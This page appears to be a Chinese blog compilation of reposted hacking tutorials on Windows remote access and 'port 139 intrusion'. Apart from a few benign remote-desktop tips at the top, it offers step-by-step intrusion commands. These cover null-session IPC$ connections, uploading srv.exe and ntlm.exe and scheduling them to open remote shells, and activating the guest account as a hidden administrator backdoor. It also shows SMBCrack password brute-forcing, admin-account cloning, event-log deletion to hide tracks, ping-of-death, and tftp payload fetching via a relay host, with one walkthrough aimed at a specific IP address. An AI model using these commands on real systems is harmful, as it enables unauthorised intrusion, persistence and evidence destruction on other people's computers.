爱华网简介(略)
1)我所知道的:
1.桌面远程连接方法:直接在“开始”中运行“mstsc“命令,然后再输入要远程访问的ip和密码,即可。
2.访问共享的文件:在“开始”中运行“\IP”,或者打开“我的电脑”后在地址栏中运行“\IP”,即可访问共享的文件或目录。
3.远程访问某个盘符,如C盘,与2类似,运行“\IPc$”,将访问到IP所在的C盘。
2)下面是转载自其他博客或网页的文章:
1.(转自)http://hi.baidu.com/������/blog/item/b48b322454a2dc2ad507423d.html
方法很多了!!!
一:先用扫描工具(在这里推荐啊D工具包还有流光扫描器都可以!)扫描IP段扫到开3389端口的电脑!!!
然后在用3389登陆器或者XP自带的远程桌面连接工具输入你扫描到的开3389端口的IP连接就可以了!!!不过你得知道对方的登陆密码!!!
二:ipc$连接具体命令:在开始-运行里输入:
建立空连接: (就是对方电脑没密码的情况)
1.net use \对方IPipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2.建立非空连接:
net use \IPipc$ "用户名" /user:"密码" (同样有3个空格)
3.如果这两中情况有一个提示命令成功接一下就是映射对方的磁盘到本地.命令是:
net use z: \IPc$ "密码" /user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \IPc$
然后打开我的电脑看看是不是对放的那个你想映射的盘跑到你的电脑上了.然后你想对他的这个盘做什么都可以:删除文件.任意修改.复制.粘贴.都可以总之就像是在操控自己的电脑一样!!!
4.下面是删除与他的连接映射命令:
(1)删除一个ipc$连接
net use \IPipc$ /del
(2)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
下面的你可能看不懂,呵呵不过你可以先认识一下也可以的
经典入侵模式
1. C:>net use \127.0.0.1IPC$ ""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:>copy srv.exe\127.0.0.1admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:>net time \127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:>at \127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:>net time \127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:>copy ntlm.exe\127.0.0.1admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:WINNTsystem32>ntlm
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"netstart telnet"来开启Telnet服务!
9. Telnet127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:>net user guest /active:yes
将对方的Guest用户激活
11. C:>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:>net localgroup administrators guest/add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
2.(转自)http://hi.baidu.com/����ռ�/blog/item/b33aee033b4004ef09fa93da.html
常用的DOS命令建立到远程主机的连接
net use \ipipc$ "password" /user:"username"
建立新用户
net user username password /add
修改用户密码
net user username newpassword
激活用户
net user username /active:yes
把用户加入到用户组
net localgroup groupname username /add
查看远程主机的时间
net time \ip
显示远程主机的共享资源列表
net view \ip
启动和停止系统服务
net start(stop) servicename
映射对方的硬盘
net use z: \ipc$
启动程序
at \ip time programnane
文件复制
copy filename \ipc$filename
远程执行FTP命令
echo open servername > c:ftp.txt
echo username >> c:ftp.txt
echo password >> c:ftp.txt
echo get filename c:filename >>c:ftp.txt
ftp -s:c:ftp.txt
del c:ftp.txt
删除日志
del c:winntsystem32logfiles*.*
del c:winntssytem32config*.evt
del c:winntsystem32dtclog*.*
del c:winntsystem32*.log
del c:winntsystem32*.txt
del c:winnt*.txt
del c:winnt*.log
访问对方共享资源
net use \192.168.1.1c$ /user:administrator "123"
如果提示连接成功,你在输入
start \192.168.1.1c$
就打开目标机的C盘了
----------------------------------
net use \ipipc$ " " /user:" " 建立IPC空链接
net use \ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \ipc$ 登陆后映射对方C:到本地为H:
net use \ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \目标ip 查看对方时间
net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
#2 二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt对比二个文件并把不同之处输出到3st.txt文件中,"> "和">>" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe \ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏属性;用+则是添加为某属性
dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )
| 139端口入侵 net命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。 net use net use命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入netuse\IPIPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。netuse 还有一个用处,即映射远程机器的共享资源,输入net use z: \IPC$(注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C盘的操作。怎么样,是不是很有意思呢? net view net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用netview 来查看,你会发现并无C,D,E之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。 net share net share 用于开放共享,输入net shareQQ=c:tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用netshare 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net shareIPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。 net user net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看netuser 命令是如何对用户进行操作的。 ┎───────────────────────────────────────────────────────┒ ┃ net user hacker 12345 /add建立一个名为hacker,密码为12345的用户。 ┃ ┃ net user hacker /del删除名为hacker的用户。 ┃ ┃ net user hacker /active:no禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃ ┃ net user hacker /active:yes激活已禁用的hacker这个用户。 ┃ ┃ net localgroup administrator hacker /add把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃ ┖───────────────────────────────────────────────────────┚ net start / net stop net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc(停止网页服务),然后替换网页,对此命令我不多讲,知道即可。 *at 命令,net time 之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \ip 9:00 telnet就启动了telnet服务,at这个命令就是用来远程运行程序的. (5)需要准备的工具 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机 SMBCrack 针对特定主机,暴力猜解密码 DameWare Mini Remote Control 监控运程屏幕 CA.exe 克隆管理员账号 第二部份:入侵实例 今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:netuse \218.80.236.37IPC$ ""/user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:nettime \218.80.236.37 显示: \218.80.236.37 的当前时间是 2003/5/22 上午10:32。然后用at命令启动远程主机的telent服务,at \218.80.236.37 10:32telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent218.80.236.37 23,出现如图提示窗口(图二),敲入administrator回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345更改guest的密码为12345,net localgroup administrators guest /add把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"hostname"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。 文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下: (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack218.80.236.37 administrator words.txt 139就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。 (2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(cloneadministrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \218.80.236.37Administrator Password IUSR_VICTIMSetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。 (3)at 这个命令有点搞笑,很多人先net view \IP 看了时间后,再用at来启动对方程序却常常失败,这是因为很多人都不知道,用net view \IP得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \IP15:00 telent。 好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。 你可以通过这个链接引用该篇文章:http://xiaobaodipan.bokee.com/tb.b?diaryId=15631644 Win2003系统下新增命令(实用部份) 远程控制命令 Shutdown.exe
fpipe.exe fpipe.exe (TCP端口重定向工具)在第二篇中有详细说明(端口重定向绕过防火墙) OpenTelnet.exe(远程开启telnet工具) opentelnet.exe \IP帐号 密码 ntlm认证方式 Telnet端口(不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet \ip连接上对方。
resumetelnet.exe \IP 帐号 密码用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。 |
